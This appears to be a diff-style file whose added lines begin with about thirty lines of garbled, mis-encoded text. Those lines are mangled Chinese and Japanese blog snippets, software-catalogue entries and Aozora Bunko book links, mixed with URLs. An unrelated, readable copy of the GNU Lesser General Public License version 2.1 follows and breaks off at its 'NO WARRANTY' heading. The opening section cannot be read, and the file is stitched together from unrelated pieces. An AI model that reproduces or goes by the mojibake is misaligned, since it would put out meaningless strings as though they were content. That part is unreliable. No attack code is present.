+(c) OAAauAblogIaDN*thIn!PSLiveMessageuAooI"EeOAO2*C3PS*a, PS!?EOOIi1/4OPa,oblogPS!O2?EOO,oDO -EeOAIaDNuANuE1/2oI,uDAEuE!PS / / oI http://del.icio.us' Del.icio.us OO1/4deg http://www.furl.net'
+(c) PS!OaeEae*th!PSxoIi?aE1/43oAA1/4uAoONPS! 1/2nIiEY +-+-'o!PS http://www.blogcn.com/User3/luciferwang/blog/27037020.html target blank a-AAE IA http://www.blogcn.com/blog/trackback.asp?mydiary
+(c) AaAaEC/EC/uAPIIAPS!OaAiAaeN|A1/4+-ouA!P http://ccca.nctu.edu.tw/~hlb/articles/archives/000662.php' Wiki 1/4o1/2e !*?EOO2I?1/4!PSOU!P http://ccca.nctu.edu.tw/~hlb/articles/archives/000662.php'
+(c) AyxOPS!AEaODdeguA"PthEO3u!C/3/4U a1ae (r)*thInAeEoOO1/4degO ,oudegdegxOE1/2a11Ey3/4Y?a!PS IO*C/21/4uADAIC/PSo http://base.google.com/base/search?q neckties http://base.google.com/base/search?q
+(c) DA!a!aE<<ECAaAeEoAiIauAA(r)EuuA!PS IOEuAEPS!ACO1/2EIuAxOIa>>1oUOEAU http://www.blogcn.com/User14/xyl5400/blog/26093815.html target blank a-AAE IA http://www.blogcn.com/blog/trackback.asp?mydiary
+(c) 1OIPuAPS!EiOUEoIaODuAEEdegNOaOOIPuA2 PIuA <2Y PS!+-!*C/!PS ?EECPS!3/4?3/41EECE$?Oss!PS http://www.blogcn.com/user3/chen56/blog/431803.html target blank> a-AAE IA http://www.blogcn.com/blog/trackback.asp?mydiary
+(c) AO1/2i!PS oOssAuOox D'A1/2*YOOEIuAIAxOIA1/4thPS!AUEYEOOD2iOiPS!u br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/302.htm IA1/4th1$?3/4ss /a a http://www.softsea.net/cat/30208.htm
+(c) IEDDOss1/2 A/O IPS!IyIyEuACECEcoIEIEPWikiuA!PS / / IOAE1/2au1/2uAIO ,oWikiEC http://www.chinesepython.org/cgi_bin/moingb.cgi' ODoth'oOOOo PS!Eu?EAUECOU2002Ae5O*Y?aI"uA!PS http://www.chinesepython.org/cgi_bin/moingb.cgi'
+(c) Ae,A !x$?I!C/E!oI!uE$?E$?e$?eEYIo$?C$?C/$?e!PSY EY $?Y e!O http://www.aozora.gr.jp/cards/000009/card45340.html' degA1aeEnAESS?I$?IAEae !x$?IEYIo1/4O$?I!C/ deg3/4a+-/ANuE!E http://www.aozora.gr.jp/index_pages/person726.html
+(c) xO!C/OeIOIoPS!1/2a3/4oAEOAGBKeEaEeuAOUBIG5e*PISSAUuAxO*uIoBIG5Oy3PSxa uAIEIa!PSEu br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/310.htm ODIAIuI3 /a a http://www.softsea.net/cat/31003.htm
+(c) !E$?a$?A$?i$?odegaAA OAE$?ss'1$?"$?aIae$?A$?+-$?E!E !!$?E$?a!C/$?a$?A$?i$?o*CoU$?u$?i$?AE$?$?$?e1/4I??$?IAae$?C$?a2 o1/2$?E'O$?1$?e$?a$?I$?I$?a$?A$?i$?o+-oA/$?C$?I$?E$?$?!PSCdeg$?I$??$?a!PS... http://blog.livedoor.jp/safe_food_of_asia
+(c) 1/2"OixOP-OEDDEi1/4thuAO OO*1/2E1/2PS!AaOU1/4,,o*OOOOOAUAU1 1/2"OiAauAxO1/4ouA CD/DVD xOP-OEDDEi1/4th!PS br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/308.htm ?a*C/OAEx/ /a a http://www.softsea.net/cat/30801.htm
+(c) D!'iIoPS!degU*OdegU1/4aeEYEI'udegae+-3/4!PS2EOA,uIE1/2ouA?iEUEa*"PS!Ei1/4th1/4aEOdeg2xdeg,u1/4OE Aaex1/4+-,!PS br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/303.htm IuI3OoC? /a a http://www.softsea.net/cat/30304.htm
+(c) OAEuuA1|AUA'uxaAauAIOEaOaCo!PSI!E+-PS!EmEditorECO ,oD!DICa+-a?iEUuAIAEe+-a1/43IE1/2.EuODDiPaC?'ouA1|AUAyEcOA br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/302.htm IA1/4th1$?3/4ss /a a http://www.softsea.net/cat/30208.htm
+(c) 2E$?I OP! !E!C/AIEO21$?!PS+-oiEE!E http://www.aozora.gr.jp/cards/000020/card44722.html' E1/4 I$?E1/2/IY !E!C/E!AA+-N O$?!PS+-oiEE!E http://www.aozora.gr.jp/cards/000057/card43276.html' 3/4a$?IE3/4A,3P !E!C/,PI+-'i$?!PS+-oiEE!E http://www.aozora.gr.jp/cards/000293/card4680.html'
+(c) Ae "u !C/ http://www.aozora.gr.jp/cards/000157/card45240.html' 1/4c$?I$?A$?E$?a !C/ http://www.aozora.gr.jp/cards/000157/card45242.html' ?'u!I-EN$?oIA$?o !C/ http://www.aozora.gr.jp/cards/000157/card45243.html' 3/43|$?ED$?1$?e'NCdeg !C/ http://www.aozora.gr.jp/cards/000157/card45475.html'
+(c) A<<$?I!C/PS,oiEE!E http://www.aozora.gr.jp/cards/000157/card45238.html'> 3AE?I?'uUAEa$?IEeuU !C/ http://www.aozora.gr.jp/cards/000157/card45379.html'> uOuiPoI? !C/ http://www.aozora.gr.jp/cards/000157/card45474.html' u'?'Eou'? !E1/4E1!E !C/ http://www.aozora.gr.jp/cards/000157/card45239.html'
+(c) 13/4!O http://www.aozora.gr.jp/cards/000275/card4715.html' ,D,/Ac+-AE !x!C/IU21/4IYAIo!O http://www.aozora.gr.jp/cards/000120/card4702.html' uthoaE1,<<I? !x!C/IU21/4Io,1/4!O http://www.aozora.gr.jp/cards/000526/card4702.html'> > 3+-C/$?IE/*E !x!C/AcoeAEPS1/4!O http://www.aozora.gr.jp/cards/000158/card4710.html'
+(c) A'EuIOPS!OaPOOU2EAn1/4PuAOA SSu1EC?EDDPS!Ec1uOou1/2,ssEOuA degACOaeuAODua2 ?degO /AEAP!PS 1OD3/4IECIOOUuAAEAE1/2aEi1/4thoUPaPS!EaE IaWord!C/Excel!C/WpsuEIAuuEeOAAEAUe br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/302.htm IA1/4th1$?3/4ss /a a http://www.softsea.net/cat/30216.htm
+(c) O ,o1/2cAaeOAOUEOOoAEuDAoAoIEy3/4Y CD!PSOaO2deguA"AUA|EOoIxo3oI!IA1/4th!PS+- Ia,ssIOO/deguA"POAauAI2deg(r)uAIA1/4th1/4DoIOAOU2e?'IaAE!IoEoOI1/4ACNuuA2 I!uAIA1/4th*c3/4degEeOAuA?i1/2Y*1/2E1/2!PS br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/301.htm EuOA1$?3/4ss /a a http://www.softsea.net/cat/30104.htm
+(c) A<<!C/$?E$?a$?EPSuoiEE$?!,o3<<$?u$?i$?AE$?$?$?e!PS>>uAAAEOESS$?I!C/!O http://www.aozora.gr.jp/cards/000042/card42257.html'> uE+-i> I1/21/2C- !x!O http://www.aozora.gr.jp/cards/000042/card42697.html' ,|uaeAaOAU$?IIUA(r) !x!O http://www.aozora.gr.jp/cards/000042/card42698.html' ,A,i$?EAE Pn !x!O http://www.aozora.gr.jp/cards/000042/card43076.html'
+(c) A<<$?I!C/!O http://www.aozora.gr.jp/cards/000157/card43482.html'> AUAC!1!EPS+-!E !x!O http://www.aozora.gr.jp/cards/000157/card43483.html'> AUAC!1!EPS2!E !x!O http://www.aozora.gr.jp/cards/000157/card43488.html' EUOO$?I i?A$?o x$?O !x!O http://www.aozora.gr.jp/cards/000157/card43489.html' I!,AdegiSS !x!O http://www.aozora.gr.jp/cards/000157/card43505.html'
+(c) AEEuODAaDIuA?12!P3/4*A $?PSo?12!P3/4E"AeOCPS!1/4a?OAE/PS!DDIaxePIoIIeE<<1/4iNe!PSEuOSS3O1/4,ooECEuODuAAEOI"2Ux/IuI3!C/e-mail I"*oI*A>>dC1/2!PSKaspersky?OOAEEuOD?EAUuA2!P3/41/2oEePE?UPS!EuC?'ouA1|AUoI3/4O2?Ae iDOOO1/4deg br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/311.htm 2!P3/4*AOI /a a http://www.softsea.net/cat/31114.htm
+(c) x!xAPS!oIIOdeg(r)uAEEOUO AEdPS!IiIiOEEOPS!AEaEuuAE2A'P1/42 Ie!PSIO3/4IIeoIEyA?IiO AEdxoxAPS!?'xAPO*1/2D|!PS3oEY xss*uAE+-ooPS!E-3/4ouAE+-ooP1/4AxAEOPS!IiEI+-SSxAEu degPS!yyE-xAPS!Ec1udegeO1P1/4DNAEPS!3/4I3$?3/4AuO1/2OIC!PS 3/4IECOaNu!PS http://www.blogcn.com/User3/luciferwang/blog/26143344.html target blank a-AAE IA http://www.blogcn.com/blog/trackback.asp?mydiary
+(c) ,aPS!O?-!PSA?CdegON3/43oAEEyAEUPS!OaEyAEUA?O AEUP1/4ODO AEa1OOUWikiuAIAOPS!IAOuAOEA?+-E1/2I,ss!PSIO3/4ouAI*A1/2AEU1OOUWikiuAIAO+-E1/2IOD1/4UOuPSoDixOouA!P http://www.newzilla.org/2004/06/08/' WikiuAAuE*oI1/41/4EoIODO !*oI2 OaAux/OssuA3$?IA!P http://www.newzilla.org/2004/05/22/wiki_application' Wiki uAOEOA !*!PSIO+-dEC!P http://www.newzilla.org/2004/05/22/wiki_application'
+(c) !x!C/!O http://www.aozora.gr.jp/cards/000160/card3344.html' AEEEUAU3/4aI|oiAi !x!C/!O http://www.aozora.gr.jp/cards/000160/card3342.html' $?I$?i$?I$?iE$?AAE$?IPAdegU !x!C/!O http://www.aozora.gr.jp/cards/000160/card3345.html' oPSAI$?D$?E$?*Eu1cE1/4AA !x!C/!O http://www.aozora.gr.jp/cards/000160/card3347.html' Ai thI11O3o !x!C/!O http://www.aozora.gr.jp/cards/000160/card3346.html'
+(c) a-AAAE/!C/xEO'1UAiAE/!C/Windows commander1/4degAUP"uAa-AAAPSE1/2PS!EaeE1OAOssuAI2oAPS!IThIThOAEuAPa'deg,nOe?EE(r)AE1/2 o'1O+-AAADPS!OSS3OAUP"uA?i1/2Y1|AU oxEO'1UAiAE/uA?i1/2Y1|AU+-i!PSIA1/4th1UAi*1/2AaePSodeguA"O degauA,'OAE!C/OAEP-uE br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/302.htm IA1/4th1$?3/4ss /a a http://www.softsea.net/cat/30214.htm
+(c) A<<$?!PS2oiEE!E http://www.aozora.gr.jp/cards/000157/card45237.html'> +-ThA$?> i2E$?E1/2/A !C/ http://www.aozora.gr.jp/cards/000157/card45241.html' 1/2e1/2/$?I1/2a*e$?oIA$?o !E!C/AYuxI'AEo$?!PS3oiEE!E http://www.aozora.gr.jp/cards/000212/card45632.html' AeA,$?I'e !C/ http://www.aozora.gr.jp/cards/000212/card45633.html' AO$?I'a !C/ http://www.aozora.gr.jp/cards/000212/card33229.html'
+(c) 1O$?u$?i$?AE$?$?$?E$?<<$?A$??!E$?1/2$?o$?E>>th!C/1OAI1/4O!|3/4-C-Pae3UEoE,,E$?I!OEa$? $?OEo1OAc!x$?o,A1/2nA1$?C,<<$?A$?+-$??!PSAaeEO$?-$?e$?$?$?IA1$?u$?A$?+-$?i$?E!C/AEE$?ss+-th$?"$?!$?C/$?A$?AEcEN$?EIICo$?<<$?A$??!PSAAPoE,,E$?oAI$?A$??>>th$?E!C/2!EUaoAE2$?E3$?Ii1/21/2>>deg$?II3/4Adeg$?o, $?A$?+-$?AE!C/cEN$?E$?|$?i$?*$? <$?A$??u2+-$?!$?C/$?e!PS!O http://www.aozora.gr.jp/cards/000160/card3527.html'>
+(c) AEaEu+-,*YxdegOAuA3IDoPS!?EOO1/4i2e3oA?uACDAE!AiAaeEuEO1/4uAIA1/4thEC*nIeOu!C/ODA ODEd U!PS2C/CO?EOO+-EPOOE1/4IA1/4thOOx/1/2oO 21/2uAE*EI!PS3IDoE1OA*C3PS1/4ouY PS!1/2<<1aAIAE!*A1/2o1aCyE>>oo?aE1/41/4i2e1/4'?E!PSAu 1?EOO1/2<<1/4i2eoouA1/2a1u'ae3EO>>,oIAxOIA1/4th+-,2e!PS br a http://www.softsea.net/cat/3.htm IuI31$?3/4ss /a a http://www.softsea.net/cat/301.htm EuOA1$?3/4ss /a a http://www.softsea.net/cat/30104.htm
+(c) IAOAiPS!O ODEyAaEu iOU?-uAED1/2o*OeuAACAEa!P http://blogbus.com/blogbus/blog/diary.php?diaryid 119296' PO degx"*APSoIyWard CunninghamI,EoWikiO(r)CdegEA1/2nEu !*?EOOoIEuACuA1$?x/aeCAA!PSIOACOaEIOaeIoEuACNSSIdeg!PSIOPOPOdegPuAAE1/2aODIThPS! oDi 1ODoAPa+-|2OA OD*C/IO!PSIOAE1/2au1/2uAoAuAxEAI'o,AODIAae1/4,,oA'O'PSo http://blog.schee.info/' Schee (DixOo) !C/ http://ccca.nctu.edu.tw/~hlb/articles/' hlb (N|A1/4+-o) oI http://www.newzilla.org/'
+(c) !C/ http://www.aozora.gr.jp/cards/000160/card3344.html' AEEEUAU3/4aI|oiAi !C/ http://www.aozora.gr.jp/cards/000160/card3342.html' $?I$?i$?I$?iE$?AAE$?IPAdegU !C/ http://www.aozora.gr.jp/cards/000160/card3345.html' oPSAI$?D$?E$?*Eu1cE1/4AA !C/ http://www.aozora.gr.jp/cards/000160/card3347.html' Ai thI11O3o !C/ http://www.aozora.gr.jp/cards/000160/card3346.html' AEC'$? UE-IA'+- !E$?!,o3 <$?u$?i$??!PS!O http://www.aozora.gr.jp/cards/000160/card3343.html'>
+(c) uOU Y AaIouA?a*AE1/21UAiAE1/2I" *3/43!PSAEaODjWikixOIiA?uUO 1/2xPI?aE1/4OU2001Ae12O27EOPS!1/2aEoOU2002Ae01O14EO!PS3/4YEu!deg1/2!oy!+-DOPOOa,o1/2xPIuA1+-Ixxi'o!PSuUO 1/2xPI1/2aEooo2 3/4APS!EuAC3/4I?aEeAEO ,o2aEOuAO3/4ua http://www.softme.org/' softme.org (A?CdegOa,oO3/4ua2 I")PS!A'2aEOEuACuAWikiIuI3!PSIOOo3/4OUAC,oIuI3EIxC/2a1y!PSWebPMIiA?uA?a*C/IAPOoAIn 1EC1uAU+-E1/2IOcEu1/4uXPuAPOIe!PSjWikiIiA?OA1/2n 1OU iO3/4PS!1/2nAe7O6EO http://www.clinux.org/forum/showthread.php?threadid
+(c) !C/ http://www.aozora.gr.jp/cards/001166/card43723.html' !OE21/2n tha!x$?I1/2D,1/2 !C/ http://www.aozora.gr.jp/cards/001166/card43724.html' A,$?Th$?iEN$?A$??AOoaIY uU !C/ http://www.aozora.gr.jp/cards/001166/card43726.html' AI1/4+-$?EA-1/4PS$?E$?II*IY !C/ http://www.aozora.gr.jp/cards/001166/card43727.html' AIEyE,21/2+-?AEdegEo1d !C/ http://www.aozora.gr.jp/cards/001166/card43730.html' Ii$?E 3$?E$? $?<<$?eAEu$?IPP !C/ http://www.aozora.gr.jp/cards/001166/card43731.html'> I+-2$?I*i'E !E$?C$?C/$?e!PS!O http://www.aozora.gr.jp/cards/001166/card43723.html'>
+(c) A<<$?!PS2oiEE!E http://www.aozora.gr.jp/cards/000157/card45397.html'> oa$?EE3!EAEaAAEOAIdegAIo!E !C/ http://www.aozora.gr.jp/cards/000157/card45396.html'> !Ooa$?EE3!x$?I |?Ioa !E!C/3$?Ii1/21/2 deg$?!PS2oiEE!E http://www.aozora.gr.jp/cards/000160/card3530.html' Po1/2+-*UEo !C/ http://www.aozora.gr.jp/cards/000160/card3531.html' $?-$?i$?!$?IA*Pe !E!C/AOAAE' deg$?!PS2oiEE!E http://www.aozora.gr.jp/cards/000256/card43129.html' 3OA,$?EPuIU !C/ http://www.aozora.gr.jp/cards/000256/card43130.html' 3OA,$?EA,3e !E!C/AYuxI'AEo$?!PS2oiEE!E http://www.aozora.gr.jp/cards/000212/card4839.html' ou$?u$?-Ac 1/2O$?I$? <$?I$??$?i !C/ http://www.aozora.gr.jp/cards/000212/card4840.html'> ou$?u$?-Ac , <AI$?e$?IA$?3| !E!C/uUo,1/4PS$?!PS+-oiEE!E http://www.aozora.gr.jp/cards/000081/card45308.html'>
+
+GNU LESSER GENERAL PUBLIC LICENSE
+
+Version 2.1, February 1999
+
+Copyright (C) 1991, 1999 Free Software Foundation, Inc.
+
+51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+
+Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed.
+
+[This is the first released version of the Lesser GPL. It also counts as the successor of the GNU Library Public License, version 2, hence the version number 2.1.]
+
+Preamble
+
+The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public Licenses are intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users.
+
+This license, the Lesser General Public License, applies to some specially designated software packages--typically libraries--of the Free Software Foundation and other authors who decide to use it. You can use it too, but we suggest you first think carefully about whether this license or the ordinary General Public License is the better strategy to use in any particular case, based on the explanations below.
+
+When we speak of free software, we are referring to freedom of use, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish); that you receive source code or can get it if you want it; that you can change the software and use pieces of it in new free programs; and that you are informed that you can do these things.
+
+To protect your rights, we need to make restrictions that forbid distributors to deny you these rights or to ask you to surrender these rights. These restrictions translate to certain responsibilities for you if you distribute copies of the library or if you modify it.
+
+For example, if you distribute copies of the library, whether gratis or for a fee, you must give the recipients all the rights that we gave you. You must make sure that they, too, receive or can get the source code. If you link other code with the library, you must provide complete object files to the recipients, so that they can relink them with the library after making changes to the library and recompiling it. And you must show them these terms so they know their rights.
+
+We protect your rights with a two-step method: (1) we copyright the library, and (2) we offer you this license, which gives you legal permission to copy, distribute and/or modify the library.
+
+To protect each distributor, we want to make it very clear that there is no warranty for the free library. Also, if the library is modified by someone else and passed on, the recipients should know that what they have is not the original version, so that the original author's reputation will not be affected by problems that might be introduced by others.
+
+Finally, software patents pose a constant threat to the existence of any free program. We wish to make sure that a company cannot effectively restrict the users of a free program by obtaining a restrictive license from a patent holder. Therefore, we insist that any patent license obtained for a version of the library must be consistent with the full freedom of use specified in this license.
+
+Most GNU software, including some libraries, is covered by the ordinary GNU General Public License. This license, the GNU Lesser General Public License, applies to certain designated libraries, and is quite different from the ordinary General Public License. We use this license for certain libraries in order to permit linking those libraries into non-free programs.
+
+When a program is linked with a library, whether statically or using a shared library, the combination of the two is legally speaking a combined work, a derivative of the original library. The ordinary General Public License therefore permits such linking only if the entire combination fits its criteria of freedom. The Lesser General Public License permits more lax criteria for linking other code with the library.
+
+We call this license the "Lesser" General Public License because it does Less to protect the user's freedom than the ordinary General Public License. It also provides other free software developers Less of an advantage over competing non-free programs. These disadvantages are the reason we use the ordinary General Public License for many libraries. However, the Lesser license provides advantages in certain special circumstances.
+
+For example, on rare occasions, there may be a special need to encourage the widest possible use of a certain library, so that it becomes a de-facto standard. To achieve this, non-free programs must be allowed to use the library. A more frequent case is that a free library does the same job as widely used non-free libraries. In this case, there is little to gain by limiting the free library to free software only, so we use the Lesser General Public License.
+
+In other cases, permission to use a particular library in non-free programs enables a greater number of people to use a large body of free software. For example, permission to use the GNU C Library in non-free programs enables many more people to use the whole GNU operating system, as well as its variant, the GNU/Linux operating system.
+
+Although the Lesser General Public License is Less protective of the users' freedom, it does ensure that the user of a program that is linked with the Library has the freedom and the wherewithal to run that program using a modified version of the Library.
+
+The precise terms and conditions for copying, distribution and modification follow. Pay close attention to the difference between a "work based on the library" and a "work that uses the library". The former contains code derived from the library, whereas the latter must be combined with the library in order to run.
+
+TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+   0. This License Agreement applies to any software library or other program which contains a notice placed by the copyright holder or other authorized party saying it may be distributed under the terms of this Lesser General Public License (also called "this License"). Each licensee is addressed as "you".
+
+   A "library" means a collection of software functions and/or data prepared so as to be conveniently linked with application programs (which use some of those functions and data) to form executables.
+
+   The "Library", below, refers to any such software library or work which has been distributed under these terms. A "work based on the Library" means either the Library or any derivative work under copyright law: that is to say, a work containing the Library or a portion of it, either verbatim or with modifications and/or translated straightforwardly into another language. (Hereinafter, translation is included without limitation in the term "modification".)
+
+   "Source code" for a work means the preferred form of the work for making modifications to it. For a library, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the library.
+
+   Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running a program using the Library is not restricted, and output from such a program is covered only if its contents constitute a work based on the Library (independent of the use of the Library in a tool for writing it). Whether that is true depends on what the Library does and what the program that uses the Library does.
+
+   1. You may copy and distribute verbatim copies of the Library's complete source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and distribute a copy of this License along with the Library.
+
+   You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee.
+
+   2. You may modify your copy or copies of the Library or any portion of it, thus forming a work based on the Library, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions:
+
+      a) The modified work must itself be a software library.
+
+      b) You must cause the files modified to carry prominent notices stating that you changed the files and the date of any change.
+
+      c) You must cause the whole of the work to be licensed at no charge to all third parties under the terms of this License.
+
+      d) If a facility in the modified Library refers to a function or a table of data to be supplied by an application program that uses the facility, other than as an argument passed when the facility is invoked, then you must make a good faith effort to ensure that, in the event an application does not supply such function or table, the facility still operates, and performs whatever part of its purpose remains meaningful.
+
+   (For example, a function in a library to compute square roots has a purpose that is entirely well-defined independent of the application. Therefore, Subsection 2d requires that any application-supplied function or table used by this function must be optional: if the application does not supply it, the square root function must still compute square roots.)
+
+   These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Library, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Library, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it.
+
+   Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Library.
+
+   In addition, mere aggregation of another work not based on the Library with the Library (or with a work based on the Library) on a volume of a storage or distribution medium does not bring the other work under the scope of this License.
+
+   3. You may opt to apply the terms of the ordinary GNU General Public License instead of this License to a given copy of the Library. To do this, you must alter all the notices that refer to this License, so that they refer to the ordinary GNU General Public License, version 2, instead of to this License. (If a newer version than version 2 of the ordinary GNU General Public License has appeared, then you can specify that version instead if you wish.) Do not make any other change in these notices.
+
+   Once this change is made in a given copy, it is irreversible for that copy, so the ordinary GNU General Public License applies to all subsequent copies and derivative works made from that copy.
+
+   This option is useful when you wish to copy part of the code of the Library into a program that is not a library.
+
+   4. You may copy and distribute the Library (or a portion or derivative of it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange.
+
+   If distribution of object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place satisfies the requirement to distribute the source code, even though third parties are not compelled to copy the source along with the object code.
+
+   5. A program that contains no derivative of any portion of the Library, but is designed to work with the Library by being compiled or linked with it, is called a "work that uses the Library". Such a work, in isolation, is not a derivative work of the Library, and therefore falls outside the scope of this License.
+
+   However, linking a "work that uses the Library" with the Library creates an executable that is a derivative of the Library (because it contains portions of the Library), rather than a "work that uses the library". The executable is therefore covered by this License. Section 6 states terms for distribution of such executables.
+
+   When a "work that uses the Library" uses material from a header file that is part of the Library, the object code for the work may be a derivative work of the Library even though the source code is not. Whether this is true is especially significant if the work can be linked without the Library, or if the work is itself a library. The threshold for this to be true is not precisely defined by law.
+
+   If such an object file uses only numerical parameters, data structure layouts and accessors, and small macros and small inline functions (ten lines or less in length), then the use of the object file is unrestricted, regardless of whether it is legally a derivative work. (Executables containing this object code plus portions of the Library will still fall under Section 6.)
+
+   Otherwise, if the work is a derivative of the Library, you may distribute the object code for the work under the terms of Section 6. Any executables containing that work also fall under Section 6, whether or not they are linked directly with the Library itself.
+
+   6. As an exception to the Sections above, you may also combine or link a "work that uses the Library" with the Library to produce a work containing portions of the Library, and distribute that work under terms of your choice, provided that the terms permit modification of the work for the customer's own use and reverse engineering for debugging such modifications.
+
+   You must give prominent notice with each copy of the work that the Library is used in it and that the Library and its use are covered by this License. You must supply a copy of this License. If the work during execution displays copyright notices, you must include the copyright notice for the Library among them, as well as a reference directing the user to the copy of this License. Also, you must do one of these things:
+
+      a) Accompany the work with the complete corresponding machine-readable source code for the Library including whatever changes were used in the work (which must be distributed under Sections 1 and 2 above); and, if the work is an executable linked with the Library, with the complete machine-readable "work that uses the Library", as object code and/or source code, so that the user can modify the Library and then relink to produce a modified executable containing the modified Library. (It is understood that the user who changes the contents of definitions files in the Library will not necessarily be able to recompile the application to use the modified definitions.)
+
+      b) Use a suitable shared library mechanism for linking with the Library. A suitable mechanism is one that (1) uses at run time a copy of the library already present on the user's computer system, rather than copying library functions into the executable, and (2) will operate properly with a modified version of the library, if the user installs one, as long as the modified version is interface-compatible with the version that the work was made with.
+
+      c) Accompany the work with a written offer, valid for at least three years, to give the same user the materials specified in Subsection 6a, above, for a charge no more than the cost of performing this distribution.
+
+      d) If distribution of the work is made by offering access to copy from a designated place, offer equivalent access to copy the above specified materials from the same place.
+
+      e) Verify that the user has already received a copy of these materials or that you have already sent this user a copy.
+
+   For an executable, the required form of the "work that uses the Library" must include any data and utility programs needed for reproducing the executable from it. However, as a special exception, the materials to be distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable.
+
+   It may happen that this requirement contradicts the license restrictions of other proprietary libraries that do not normally accompany the operating system. Such a contradiction means you cannot use both them and the Library together in an executable that you distribute.
+
+   7. You may place library facilities that are a work based on the Library side-by-side in a single library together with other library facilities not covered by this License, and distribute such a combined library, provided that the separate distribution of the work based on the Library and of the other library facilities is otherwise permitted, and provided that you do these two things:
+
+      a) Accompany the combined library with a copy of the same work based on the Library, uncombined with any other library facilities. This must be distributed under the terms of the Sections above.
+
+      b) Give prominent notice with the combined library of the fact that part of it is a work based on the Library, and explaining where to find the accompanying uncombined form of the same work.
+
+   8. You may not copy, modify, sublicense, link with, or distribute the Library except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense, link with, or distribute the Library is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance.
+
+   9. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Library or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Library (or any work based on the Library), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Library or works based on it.
+
+   10. Each time you redistribute the Library (or any work based on the Library), the recipient automatically receives a license from the original licensor to copy, distribute, link with or modify the Library subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties with this License.
+
+   11. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Library at all. For example, if a patent license would not permit royalty-free redistribution of the Library by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Library.
+
+   If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply, and the section as a whole is intended to apply in other circumstances.
+
+   It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice.
+
+   This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License.
+
+   12. If the distribution and/or use of the Library is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Library under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License.
+
+   13. The Free Software Foundation may publish revised and/or new versions of the Lesser General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns.
+
+   Each version is given a distinguishing version number. If the Library specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Library does not specify a license version number, you may choose any version ever published by the Free Software Foundation.
+
+   14. If you wish to incorporate parts of the Library into other free programs whose distribution conditions are incompatible with these, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally.
+
+   NO WARRANTY
+
